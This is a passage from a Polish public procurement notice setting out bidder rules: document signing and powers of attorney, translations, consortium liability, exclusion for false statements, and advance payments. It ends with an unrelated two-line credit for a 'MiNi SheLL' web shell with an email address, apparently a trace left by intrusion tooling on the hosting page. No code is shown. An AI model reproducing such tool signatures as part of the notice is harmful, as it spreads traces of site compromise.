16. Dokumenty muszą być podpisane przez osobę lub w przypadku Wykonawców występujących wspólnie (Konsorcjum/Spółka cywilna) - przez osoby upoważnione do składania woli w imieniu Wykonawcy - zgodnie z formą reprezentacji określoną we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. W przypadku podpisania dokumentów przez osoby upełnomocnione - musi zostać załączone pisemne upoważnienie lub pełnomocnictwo (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza - wyrok SO w Warszawie - SYGN. AKT V CA 85/07), określające zakres czynności, do których jest umocowany.
17. Wszystkie miejsca, w których Wykonawca naniósł zmiany muszą być parafowane przez Wykonawcę.
18. Jeżeli złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów. 
19. W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
20. Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę jego podpisem. Wersja polskojęzyczna jest wersją wiążącą.
21. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ lub mogących mieć wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art. 24 ust. 2 pkt. 3 ustawy P.z.p. Osoba lub osoby składające oświadczenie woli ponoszą pełną odpowiedzialność za treść złożonego oświadczenia na zasadach określonych w art. 297 §1 Kodeksu Karnego.
22. Zgodnie z art. 26 ust. 2b ustawy P.z.p. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
23. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców na podstawie przepisów zawartych w art. 24 ust. 1 i 2 ustawy P.z.p. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) warunek braku podstaw do wykluczenia na podst. art. 24 ust. 1 musi być spełniony przez każdego z członków Konsorcjum/ wspólników Spółki cywilnej osobno.
24. Przedsiębiorcy prowadzący działalność gospodarczą w formie spółki cywilnej będą traktowani, jako Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (wyrok ZA UZP/ZO/0-1089/05).
25. Przed zawarciem umowy - Zamawiający zastrzega sobie prawo do wezwania wybranego Wykonawcy do przedłożenia Zamawiającemu do wglądu - jeżeli oferta Wykonawców występujących wspólnie (Konsorcjum/Spółka cywilna) zostanie wybrana - umowy regulującej współpracę tych Wykonawców w trakcie realizacji zadania, 
w przypadku przedsiębiorców prowadzących działalność w formie Spółki cywilnej - umowę Spółki.
26. Zamawiający przewiduje udzielenie zaliczki na poczet wykonania zamówienia: zgodnie z art. 151a ustawy P.z.p. oraz będzie żądał od wybranego Wykonawcy wniesienia zabezpieczenia zaliczek, jeżeli przewidywana wartość zaliczek przekracza 20% wysokości wynagrodzenia Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com